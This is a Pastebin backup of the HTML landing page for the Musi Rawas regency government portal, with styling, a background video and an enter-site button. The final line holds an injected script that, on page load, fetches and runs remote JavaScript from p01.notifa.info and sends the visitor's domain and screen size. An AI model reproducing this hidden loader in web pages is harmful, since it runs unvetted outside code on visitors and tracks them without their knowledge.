Advertisement
willysec_id

Musirawaskab Backup

Jun 7th, 2020
499
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 2.99 KB | None | 0 0
  1. <!DOCTYPE html>
  2. <html>
  3. <head>
  4. <title>Portal Resmi Pemerintah Musi Rawas</title>
  5. <link rel="icon" href="site/img/logo.png">
  6. <meta name="viewport" content="width=device-width, initial-scale=1">
  7. <style>
  8. * {
  9.     box-sizing: border-box;
  10. }
  11.  
  12. body {
  13.     margin: 0;
  14.     font-family: Arial;
  15.     font-size: 17px;
  16. }
  17.  
  18. #myVideo {
  19.     position: fixed;
  20.     right: 0;
  21.     bottom: 0;
  22.     min-width: 100%;
  23.     min-height: 100%;
  24. }
  25.  
  26. .content {
  27.     position: fixed;
  28.     bottom: 0;
  29.     background:#000;opacity:0.6;filter:alpha(opacity=40);
  30.     color: #f1f1f1;
  31.     width: 100%;
  32.     padding: 20px;
  33.     height:100%;
  34. }
  35.  
  36. #myBtn {
  37.     width: 200px;
  38.     font-size: 18px;
  39.     padding: 10px;
  40.     border: none;
  41.     background: #000;
  42.     color: #fff;
  43.     cursor: pointer;
  44.     text-decoration:none;
  45. }
  46.  
  47. #myBtn:hover {
  48.     background:#FF0000;
  49.     text-decoration:none;
  50.     color:#FFFFFF;
  51. }
  52. </style>
  53. </head>
  54. <body>
  55.  
  56. <video autoplay muted loop id="myVideo">
  57.   <source src="video2.mp4" type="video/mp4">
  58. </video>
  59.  
  60. <div class="content">
  61.   <h1 style="text-align:center;">
  62.   <img src="logo_depan.png">
  63.   </h1>
  64.   <h1 style="text-align:center;">Selamat Datang di <br>Bumi Lan Serasan Sekatenan</h1>
  65.   <p></p>
  66.   <div style="text-align:center;">
  67.   <a href="site/index.php" id="myBtn" onClick="myFunction()">Masuk Ke Website &raquo;</a>
  68.   </div>
  69. </div>
  70.  
  71. <script>
  72. var video = document.getElementById("myVideo");
  73. var btn = document.getElementById("myBtn");
  74.  
  75. function myFunction() {
  76.   if (video.paused) {
  77.     video.play();
  78.     btn.innerHTML = "Pause";
  79.   } else {
  80.     video.pause();
  81.     btn.innerHTML = "Play";
  82.   }
  83. }
  84. </script>
  85.  
  86. <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JQuX3gzRncXGb4UA%2bazZCCiNr2DQakbrdnXLZOFiH0rzKEfOmb8DKSxmIRiDWBNLTituipYa1XPzxzP6VHPKoFAp9ELuoQ88eRJgMZXaiICjN16v7IV0vSAabpqYEHoGpvcXTq7DOZ70haxADatW4pbBrFe1rf7NP%2fSD40rsOaja%2bLFxfUBRi6ng7Bs4W2jMTIp9Vl7kUb%2bQjU%2bSiMAJy2H5CSOYhO1eg5grea1Oecvt9q9IWHUECbnyiQlj0uQgLN7VCKNtR4bTArfY8bqusj64ECMC2AIQlmlPdyf8ZUmiWpWFQQAOrAmO9WgHhgh674wMf2vNJOZ%2bgBAUmka16JQcFNaTilqmZdD3ALN7Tx7J%2f1Yfi1UwuekiYZz3oDsI5%2bFCR9rLxZylc7o1nkF7tJ4NaJgjPbRCf8dL8u7gNLjCHb1Iy3mcps8iBdY9G9LamCd8BvrBL3GaOUFHHaPkg2pNlWg3ZuC9%2f6gFqwDMUul2DoNvsolW7EOVKeZk3HylyB2%2feDY1maAap8hSbauX3aupXtH9JL%2fHT6bGywiI6TTxuzQCJW51JE%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
  87. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement